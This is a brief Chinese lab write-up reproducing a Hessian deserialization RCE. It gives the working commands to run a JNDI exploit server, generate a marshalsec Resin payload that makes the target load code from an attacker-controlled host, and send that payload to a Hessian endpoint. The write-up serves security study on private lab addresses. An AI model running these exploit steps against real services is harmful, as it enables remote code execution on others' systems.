Hessian反序列化RCE漏洞


Hessian反序列化RCE漏洞

靶機搭建

啟動JNDI利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 192.168.31.102
  • -C為需要執行的命令
  • -A為監聽地址

生成payload

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://192.168.31.102:8180/ ExecTemplateJDK7>hession

發送payload到hessian服務器

python hessian.py -u http://192.168.31.36:8080/HessianTest/hessian -p hession

這里的報錯是因為我python環境的問題
這里我踩了一個坑,hessian.py里需要用到一個argparse包,我本機的環境一直出問題,最后更新了pip,更新了argparse包才搞定

  • 命令執行成功

指紋

HTTP發送二進制的數據包 ???
參考:https://www.freebuf.com/vuls/224280.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM